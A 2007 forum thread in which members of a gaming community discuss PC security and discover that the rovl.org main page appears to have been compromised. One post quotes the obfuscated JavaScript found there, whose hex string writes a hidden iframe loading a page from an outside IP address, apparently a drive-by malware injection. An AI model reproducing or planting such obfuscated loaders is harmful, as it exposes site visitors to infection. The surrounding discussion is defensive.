Security Issue - Read Please!

Shadow · August 28, 2007, 09:02:50 AM

well im pretty careful of my browsing anyways... I'd be very surprised to find anything other than the occasional tracking cookie on my machine

windhound · August 28, 2007, 12:14:01 PM

eh, if you keep your box uptodate with a decent antivirus and firewall you're generally fine
but, you dont have to browse to the bad sites to get infected
http://it.slashdot.org/article.pl?sid=04/05/17/0640235 older slashdot artical: an unprotected, unpatched windows box on an open networks is vulnerable to attacks.
You dont have to go to them, they come to you = P

OneCare got slammed too
http://news.bbc.co.uk/2/hi/technology/6331959.stm
http://news.bbc.co.uk/2/hi/technology/6418965.stm

If you're going to use windows keep it safe, more zombie boxes are bad for all of us. Thats why AVG, Avast, and other antivirus programs offer a free version and ZoneAlarm is a free firewall for home users.
Windows Firewall got pitiful reviews as well, but its much better than nothing (SELinux Firewall ftw!)

last note, a hardware router (linksys, dlink, etc) is an excellent first line of defence, if they see somthin' coming in they werent expecting it generally gets thrown away. if you open ports or DMZ then that removes said protection, but thats what software firewalls are for

edit, disclaimer
...I'm just typing this 'cause its the first full week of school and I've got some downtime between classes, just spewing some general info and ideas with the idea that a small precentage of it may be useful to someone = P

Shadow · August 28, 2007, 02:47:56 PM

I have a linksys router, and I run online scans from Norton every now and again to cover some of OneCare's holes

it's worked well so far

Gen. Volkov · August 28, 2007, 03:33:23 PM

I've got pretty comprehensive protection myself.. I've never noticed viruses from rovl though.

Shadow · August 28, 2007, 03:39:50 PM

run an online scan or something - "trojandownloader" and "exploit" running around your pc sounds pretty ugly to me

Gen. Volkov · August 28, 2007, 07:54:11 PM

I mean, my McAfee catches those things pretty easily, and I run scans on a weekly basis, I've noticed nothing strange when I log on to the forums or the game. I don't use the rovl portal though.

Shadow · August 28, 2007, 08:13:21 PM

the login page is fine, only rovl causes me problems

bjornredtail · August 29, 2007, 02:09:30 PM

Quote
function v46d4d1ff29476(v46d4d1ff29c45){
function v46d4d1ff2a414 () {
return 16;
}
return(parseInt(v46d4d1ff29c45,v46d4d1ff2a414()));
}
function v46d4d1ff2b3b9(v46d4d1ff2bb83){
function v46d4d1ff2d324 () {
var v46d4d1ff2dac6=2;
return v46d4d1ff2dac6;
}
var v46d4d1ff2c353='';
for(v46d4d1ff2cb24=0; v46d4d1ff2cb24<v46d4d1ff2bb83.length; v46d4d1ff2cb24+=v46d4d1ff2d324()){
v46d4d1ff2c353+=(String.fromCharCode(v46d4d1ff29476(v46d4d1ff2bb83.substr(v46d4d1ff2cb24, 46d4d1ff2d324()))));
}
return v46d4d1ff2c353;
} document.write(v46d4d1ff2b3b9('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D316139633132207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3830343433292B27386432666361373133315C272077696474683D373831206865696768743D313033207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

Just imagen that just without the whitespace to make it somewhat readable. That funky bit of code appears on the rovl.org main page. I think this is the source of our problems.

Shadow · August 29, 2007, 03:07:57 PM

i have no idea what it means - enlighten me

wolf bite · August 29, 2007, 03:11:00 PM

The ROVL main page does go to some site to get random explanations of the 4 different sites. Maybe you are picking that up?

Wolf Bite

windhound · August 29, 2007, 04:10:37 PM

O_o well would you lookit that

naw wolf, /maybe/ the php script goes around and fetches descriptions, but I doubt it. it would be wasteful and much easier to just put it in. anyways, if it was fetching that bit shouldnt be viewable. go to http://rovl.org and view source (with firefox just right click / view page source), its a little over halfway down, just after the body tag and its contained within [script] tags

I havent any idea what that does, assuming it does anything, but its almost certainly unnessisary.

bjornredtail · August 29, 2007, 04:13:30 PM

If that were the case, why the seemingly random function names? Why the fancy encodeing of the stuff to be printed? Why the complete lack of any formating or documentation? I belive it is intentionally set up to be confuseing, diffacult to track down and malicious. Addationally, the random thing I belive is done serverside. The client never sees any of that code.

I'll take a closer look at the code later, using the powers of VIM.

Shadow · August 29, 2007, 04:54:12 PM

retto owns rovl does he not? why would he put malicious code there?

windhound · August 29, 2007, 05:50:04 PM

ever heard the term 'compromised'?
well, this is an example.
server got itself hack'd

Shadow · August 29, 2007, 05:51:27 PM

aha... well ima put it on restricted sites so i dont forget again? :-P

edit: nvm that blocks forums too ^_^